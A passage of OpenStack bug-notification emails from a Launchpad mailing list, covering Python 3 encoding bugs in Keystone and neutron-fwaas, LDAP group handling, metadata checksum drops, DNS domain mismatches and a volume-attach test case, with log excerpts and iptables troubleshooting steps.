on the nova hypervisor on which the server runs. $ iptables -A OUTPUT -d ceph-mon-addr -p tcp --dport 6800 -j DROP * Attach the volume to a running instance. $ openstack server add volume 7151f507-a6b7-4f6d-a4cc-fd223d9feb5d 742ff117-21ae-4d1b-a52b-5b37955716ff * This should cause the volume attachment to fail $ virsh domblklist instance-x Target Source vda nova/7151f507-a6b7-4f6d-a4cc-fd223d9feb5d_disk No volume should attached after this step. * If the behavior is fixed: Â Â Â * Check that openstack server show , doesn't displays the displays the volume as attached. * If the behavior isn't fixed: Â Â Â * openstack server show , will display the volume in the volumes_attached property. [Expected result] * Volume attach fails and the volume is disconnected from the host. [Actual result] * Volume attach fails but remains connected to the host. [Regression Potential] * The patches have been cherry-picked from upstream which helps to reduce the regression potential of these fixes. [Other Info] * N/A To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826523/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832265] Re: py3: inconsistent encoding of token fields
** Also affects: keystone (Ubuntu Disco) Importance: Undecided Status: New ** Also affects: keystone (Ubuntu Cosmic) Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: py3: inconsistent encoding of token fields Status in OpenStack Keystone LDAP integration: Invalid Status in OpenStack Identity (keystone): In Progress Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Cosmic: New Status in keystone source package in Disco: New Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection rollback-on-return, via agent (keystone.auth.core): 2019-06-10 19:46:59,025 DEBUG MFA Rules not processed for user `b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'`. Rule list: `[]` (Enabled: `True`). (keystone.common.wsgi): 2019-06-10 19:46:59,025 ERROR a bytes-like object is required, not 'str' Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr/lib/pyth
[Yahoo-eng-team] [Bug 1832210] Re: incorrect decode of log prefix under python 3
** Also affects: cloud-archive Importance: Undecided Status: New ** Changed in: neutron-fwaas (Ubuntu Eoan) Status: New => Fix Committed ** Also affects: cloud-archive/rocky Importance: Undecided Status: New ** Also affects: cloud-archive/stein Importance: Undecided Status: New ** Also affects: cloud-archive/train Importance: Undecided Status: New ** Changed in: cloud-archive/train Status: New => Fix Committed ** Changed in: cloud-archive/stein Status: New => Triaged ** Changed in: cloud-archive/rocky Status: New => Triaged ** Changed in: neutron-fwaas (Ubuntu Disco) Status: New => Triaged ** Changed in: neutron-fwaas (Ubuntu Cosmic) Status: New => Triaged ** Changed in: neutron-fwaas (Ubuntu Cosmic) Importance: Undecided => Medium ** Changed in: neutron-fwaas (Ubuntu Disco) Importance: Undecided => Medium ** Changed in: cloud-archive/rocky Importance: Undecided => Medium ** Changed in: cloud-archive/train Importance: Undecided => Medium ** Changed in: neutron-fwaas (Ubuntu Eoan) Importance: Undecided => Medium ** Changed in: cloud-archive/stein Importance: Undecided => Medium -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832210 Title: incorrect decode of log prefix under python 3 Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive rocky series: Triaged Status in Ubuntu Cloud Archive stein series: Triaged Status in Ubuntu Cloud Archive train series: Fix Committed Status in neutron: Fix Released Status in neutron-fwaas package in Ubuntu: Fix Committed Status in neutron-fwaas source package in Cosmic: Triaged Status in neutron-fwaas source package in Disco: Triaged Status in neutron-fwaas source package in Eoan: Fix Committed Bug description: Under Python 3, the prefix of a firewall log message is not correctly decoded "b'10612530182266949194'": 2019-06-10 09:14:34 Unknown cookie packet_in pkt=ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120) 2019-06-10 09:14:34 {'prefix': "b'10612530182266949194'", 'msg': "ethernet(dst='fa:16:3e:c6:58:5e',ethertype=2048,src='fa:16:3e:e0:2c:be')ipv4(csum=51290,dst='10.5.0.10',flags=2,header_length=5,identification=37612,offset=0,option=None,proto=6,src='192.168.21.182',tos=16,total_length=52,ttl=63,version=4)tcp(ack=3151291228,bits=17,csum=23092,dst_port=57776,offset=8,option=[TCPOptionNoOperation(kind=1,length=1), TCPOptionNoOperation(kind=1,length=1), TCPOptionTimestamps(kind=8,length=10,ts_ecr=1574746440,ts_val=482688)],seq=2769917228,src_port=22,urgent=0,window_size=3120)"} 2019-06-10 09:14:34 {'0bf81ded-bf94-437d-ad49-063bba9be9bb': [, ]} This results in the firewall log driver not being able to map the message to the associated port and log resources in neutron resulting in the 'unknown cookie packet_in' warning message. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1832210/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832766] Re: LDAP group_members_are_ids = false fails in Rocky/Stein
** Also affects: keystone (Ubuntu) Importance: Undecided Status: New ** Changed in: keystone (Ubuntu) Assignee: (unassigned) => James Page (james-page) -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832766 Title: LDAP group_members_are_ids = false fails in Rocky/Stein Status in OpenStack Identity (keystone): New Status in keystone package in Ubuntu: New Bug description: I'm running into an interesting issue with the group_members_are_ids: false Per the documentation, this means that the group's group_member_attribute values (in my case "member") are understood to be full LDAP DNs to the user records. https://docs.openstack.org/keystone/queens/_modules/keystone/identity/backends/ldap/core.html#Identity.list_users_in_group Unfortunately, the call to self._transform_group_member_ids(group_members) is calling to self.user._dn_to_id(user_key) where user_key would be a string like "uid=dfreiberger,ou=users,dc=mysite,dc=com". This code is here: https://docs.openstack.org/keystone/queens/_modules/keystone/identity/backends/ldap/core.html#Identity.list_users_in_group This calls out to: return ldap.dn.str2dn(dn)[0][0][1] https://github.com/openstack/keystone/blob/stable/rocky/keystone/identity/backends/ldap/common.py#L1298 from: https://www.python-ldap.org/en/latest/reference/ldap- dn.html#ldap.dn.str2dn, this should spit out something like: >>> ldap.dn.str2dn('cn=Michael Str\xc3\xb6der,dc=example,dc=com',flags=ldap.DN_FORMAT_LDAPV3) [[('cn', 'Michael Str\xc3\xb6der', 4)], [('dc', 'example', 1)], [('dc', 'com', 1)]] Which would then mean the return from _dn_to_id(user_key) would be "Michael Str\xc3\xb6der" or "dfreiberger" in my example user_key above. Ultimately, this means that either group_members_are_ids = false will return a user_id of the first attribute value within the DN string, even if the first field of the DN is not the actual user_name_attribute or user_id_attribute. If group_members_are_ids = true, it will return uidNumbers, which works fine with the knock on calls in the identity backend. - The problem is that the _transform_group_member_ids has to be returning a user ID such as the typical hex ID of a user in the keystone database, not the username of the user. - With group_members_are_ids, uidNumber is returned by the function, but with group_members_are_ids false, usernames are returned by the function. - Also, the _dn_to_id(user_key) from the group only returns the first entry in the DN, not the actual user_id_attribute or user_name_attribute field of the object. This requires a broken assumption that the user_id_attribute field called out in the ldap client config is also the first field of the distinguished name. - This would bug out if, say, your group had a member attribute/value pair of: member="cn=Drew Freiberger,dc=mysite,dc=com", _dn_to_id would return "Drew Freiberger" as my user_id, however, I may have told ldap that the user_name_attribute is uid, and inside my ldap record of "dn=cn=Drew Freiberger,dc=mysite,dc=com", there's a uid=dfreiberger field showing my login name is dfreiberger which is what _dn_to_id should return, or perhaps _dn_to_id should return my uidNumber=12345 attribute to actually function as expected. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1832766/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832265] Re: keystone LDAP integration in rocky not working for RBAC rules or token auth
Raising a bug task against keystone as I think that we may need to expanded the decode coverage in token_formatters. ** Changed in: keystone (Ubuntu) Assignee: (unassigned) => James Page (james-page) ** Changed in: keystone (Ubuntu) Importance: Undecided => High ** Changed in: keystone (Ubuntu) Status: New => In Progress ** Changed in: charm-keystone-ldap Status: New => Invalid -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: keystone LDAP integration in rocky not working for RBAC rules or token auth Status in OpenStack Keystone LDAP integration: Invalid Status in OpenStack Identity (keystone): New Status in keystone package in Ubuntu: In Progress Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool (sqlalchemy.pool.QueuePool): 2019-06-10 1
[Yahoo-eng-team] [Bug 1832265] Re: keystone LDAP integration in rocky not working for RBAC rules or token auth
Tl;DR - I think the disassemble functions need to deal with the encoding better under py3; if the user_id gets into keystone decoded, then it should be dealt with correctly throughout. ** Also affects: keystone Importance: Undecided Status: New -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1832265 Title: keystone LDAP integration in rocky not working for RBAC rules or token auth Status in OpenStack Keystone LDAP integration: Invalid Status in OpenStack Identity (keystone): New Status in keystone package in Ubuntu: In Progress Bug description: When using an LDAP domain user on a bionic-rocky cloud within horizon, we are unable to see the projects listed in the project selection drop-down, and are unable to query resources from any projects to which we are assigned the role Member. It appears that the following log entries in keystone may be helpful to troubleshooting this issue: (keystone.middleware.auth): 2019-06-10 19:47:02,700 DEBUG RBAC: auth_context: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG Dispatching request to legacy mapper: /v3/users (keystone.server.flask.application): 2019-06-10 19:47:02,700 DEBUG SCRIPT_NAME: `/v3`, PATH_INFO: `/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects` (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Matched GET /users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Route path: '/users/{user_id}/projects', defaults: {'action': 'list_user_projects', 'controller': } (routes.middleware): 2019-06-10 19:47:02,700 DEBUG Match dict: {'user_id': 'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'action': 'list_user_projects', 'controller': } (keystone.common.wsgi): 2019-06-10 19:47:02,700 INFO GET https://keystone.mysite:5000/v3/users/d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4/projects (keystone.common.controller): 2019-06-10 19:47:02,700 DEBUG RBAC: Adding query filter params () (keystone.common.authorization): 2019-06-10 19:47:02,700 DEBUG RBAC: Authorizing identity:list_user_projects(user_id=d4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4) (keystone.policy.backends.rules): 2019-06-10 19:47:02,701 DEBUG enforce identity:list_user_projects: {'trust_id': None, 'trustor_id': None, 'trustee_id': None, 'domain_id': None, 'domain_name': None, 'group_ids': [], 'token': , 'user_id': b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4', 'user_domain_id': '997b3e91271140feb1635eefba7c65a1', 'system_scope': None, 'project_id': None, 'project_domain_id': None, 'roles': [], 'is_admin_project': True, 'service_user_id': None, 'service_user_domain_id': None, 'service_project_id': None, 'service_project_domain_id': None, 'service_roles': []} (keystone.common.wsgi): 2019-06-10 19:47:02,702 WARNING You are not authorized to perform the requested action: identity:list_user_projects. It actually appears elsewhere in the keystone.log that there is a string which has encapsulated bytecode data in it (or vice versa). (keystone.common.wsgi): 2019-06-10 19:46:59,019 INFO POST https://keystone.mysite:5000/v3/auth/tokens (sqlalchemy.orm.path_registry): 2019-06-10 19:46:59,021 DEBUG set 'memoized_setups' on path 'EntityRegistry((,))' to '{}' (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,021 DEBUG Connection checked out from pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection being returned to pool (sqlalchemy.pool.QueuePool): 2019-06-10 19:46:59,024 DEBUG Connection rollback-on-return, via agent (keystone.auth.core): 2019-06-10 19:46:59,025 DEBUG MFA Rules not processed for user `b'd4fb94cfa3ce0f7829d76fe44697488e7765d88e29f5a896f57d43caadb0fad4'`. Rule list: `[]` (Enabled: `True`). (keystone.common.wsgi): 2019-06-10 19:46:59,025 ERROR a bytes-like object is required, not 'str' Traceback (most recent call last): File "/usr/lib/python3/dist-packages/keystone/common/wsgi.py", line 148, in __call__ result = method(req, **params) File "/usr/lib/python3/dist-packages/keystone/auth/controllers.py", line 102, in authenticate_for_token app_cred_id=app_cred_id, parent_audit_id=token_audit_id) File "/usr
[Yahoo-eng-team] [Bug 1832021] Re: Checksum drop of metadata traffic on isolated provider networks
** Also affects: charm-neutron-openvswitch Importance: Undecided Status: New ** This bug is no longer a duplicate of bug 1722584 [SRU] Return traffic from metadata service may get dropped by hypervisor due to wrong checksum ** Changed in: neutron Status: New => Incomplete -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1832021 Title: Checksum drop of metadata traffic on isolated provider networks Status in OpenStack neutron-openvswitch charm: New Status in neutron: Incomplete Bug description: When an isolated network using provider networks for tenants (meaning without virtual routers: DVR or network node), metadata access occurs in the qdhcp ip netns rather than the qrouter netns. The following options are set in the dhcp_agent.ini file: force_metadata = True enable_isolated_metadata = True VMs on the provider tenant network are unable to access metadata as packets are dropped due to checksum. When we added the following in the qdhcp netns, VMs regained access to metadata: iptables -t mangle -A OUTPUT -o ns-+ -p tcp --sport 80 -j CHECKSUM --checksum-fill It seems this setting was recently removed from the qrouter netns [0] but it never existed in the qdhcp to begin with. [0] https://review.opendev.org/#/c/654645/ Related LP Bug #1831935 See https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1831935/comments/10 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-neutron-openvswitch/+bug/1832021/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
This bug was fixed in the package neutron - 2:13.0.2-0ubuntu3.3~cloud0 --- neutron (2:13.0.2-0ubuntu3.3~cloud0) bionic-rocky; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:13.0.2-0ubuntu3.3) cosmic; urgency=medium . * d/p/bug1826419.patch: Cherry pick fix to revert incorrect changes to internal DNS behaviour (LP: #1826419). ** Changed in: cloud-archive/rocky Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Committed Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
This bug was fixed in the package neutron - 2:14.0.0-0ubuntu2~cloud0 --- neutron (2:14.0.0-0ubuntu2~cloud0) bionic-train; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:14.0.0-0ubuntu2) eoan; urgency=medium . * d/p/bug1826419.patch: Cherry pick fix to revert incorrect changes to internal DNS behaviour (LP: #1826419). ** Changed in: cloud-archive/train Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Committed Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1826419] Re: dhcp agent configured with mismatching domain and host entries
This bug was fixed in the package neutron - 2:14.0.0-0ubuntu2~cloud0 --- neutron (2:14.0.0-0ubuntu2~cloud0) bionic-train; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:14.0.0-0ubuntu2) eoan; urgency=medium . * d/p/bug1826419.patch: Cherry pick fix to revert incorrect changes to internal DNS behaviour (LP: #1826419). ** Changed in: cloud-archive Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1826419 Title: dhcp agent configured with mismatching domain and host entries Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive queens series: Fix Committed Status in Ubuntu Cloud Archive rocky series: Fix Released Status in Ubuntu Cloud Archive stein series: Fix Released Status in Ubuntu Cloud Archive train series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Bionic: Fix Released Status in neutron source package in Cosmic: Fix Released Status in neutron source package in Disco: Fix Released Status in neutron source package in Eoan: Fix Released Bug description: Related bug 1774710 and bug 1580588 The neutron-dhcp-agent in OpenStack >= Queens makes use of the dns_domain value set on a network to configure the '--domain' parameter of the dnsmasq instance that supports it; at the same time, neutron makes use of CONF.dns_domain when creating dns_assignments for ports - this results in a hosts file for the dnsmasq instance which uses CONF.dns_domain and a --domain parameter of network.dns_domain which do not match. This results in a search path on instances booted attached to the network which is inconsistent with the internal DNS entries that dnsmasq responds with: root@bionic-045546-2:~# host 192.168.21.222 222.21.168.192.in-addr.arpa domain name pointer bionic-045546-2.jamespage.internal. root@bionic-045546-2:~# host bionic-045546-2 bionic-045546-2.designate.local has address 192.168.21.222 In the above example: CONF.dns_domain = jamespage.internal. network.dns_domain = designate.local. Based on previous discussion in bug 1580588 I think that the dns_domain value for a network was intented for use for external DNS integration such as that provided by Designate. The changed made under commit: https://opendev.org/openstack/neutron/commit/137a6d61053 appear to break this assumption, producing somewhat inconsistent behaviour in the dnsmasq instance for the network. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1826419/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1832210] Re: incorrect decode of log prefix under python 3
